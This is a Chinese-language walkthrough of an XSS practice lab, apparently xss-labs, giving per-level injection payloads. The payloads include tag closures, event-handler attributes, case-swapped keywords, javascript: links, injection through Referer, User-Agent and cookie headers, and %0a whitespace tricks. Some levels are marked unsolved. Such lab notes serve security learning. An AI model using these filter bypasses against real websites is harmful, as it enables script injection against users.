目录
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19和20
1.
2.
"> <script>alert(1)</script> <"
">和前面的完成闭合
3.
'οnmοuseοver='alert(/xss/)'>
4.
输入<script'"Oon>
<'等都过滤了
输入"οnmοuseοver="alert(/xss/)"成功
5.
输入<script'>"OoNn
过滤了一些关键字,这里使用超链接
"><a href ="javascript:alert:alert(/xss/)">click</a>
6.
输入查看"οnmοuseοver="alert(/xss/)"
由此得知on会过滤但是oN没事
"oNmouseover="alert(/xss/)"
7.
过滤script和OoNn
使用"οnmοuseοver="alert(/xss/)"
得出"OoNnmouseover="alert(/xss/)"可行
8.
过滤了script"on等大小写
这里使用伪协议试一下javascript:alert(/xss/)
script还会被过滤,将s编码试一下javascript:alert(/xss/)成功
9.
javascript:alert(/xss/)
肯是xss不行换成http://baidu.com
javascript:alert('http://baidu.com')
10.
通过尝试得出在?t_sort=<script'>"OoNn时会由反应
此时在页面上添加一个按钮click" type="button" οnclick="alert(/xss/)
11.
?keyword=<script'>"OoNn查看源代码
这里应该是将服务器请求放到了ref中
这里将ref的内容替换成" type="text" οnclick="alert('xss')
点击文本框就可以完成了
12.
查看源代码应该是将服务器请求存放到了ua里面
修改ua
13.
查看源代码服务器请求应该是存放在cook里面了,
这里试了下之前的方法" type="text" οnclick="alert('xss')不可以直接执行,此时我们看一些cookie
改为user=" οnclick="alert('xss')" type="text"
14.
没捣鼓明白
15.
查看源代码
使用 <span> 元素对文本中的一部分进行着色:
ng-include 指令用于包含外部的 HTML 文件。
包含的内容将作为指定元素的子节点。
ng-include 属性的值可以是一个表达式,返回一个文件名。
默认情况下,包含的文件需要包含在同一个域名下。
后面也一直不成功
16.
center() 方法返回一个指定的宽度 width 居中的字符串,fillchar 为填充的字符,默认为空格。
在多次尝试中发现会把空格,script,/等过滤掉最终使用%0a代替空格
?keyword= <input%0atype="text"%0aοnmοuseοver="alert(1)">
17.
查看源代码
Embed 对象是 HTML5 中新增的。
Embed 对象代表一个 HTML <embed> 元素。
使用这个οnmοuseοver=alert(1)将其分别赋给a和b
?arg01=%20onmouseover&arg02=%20alert(1)
18.
和17题一样
19和20
有问题,也没做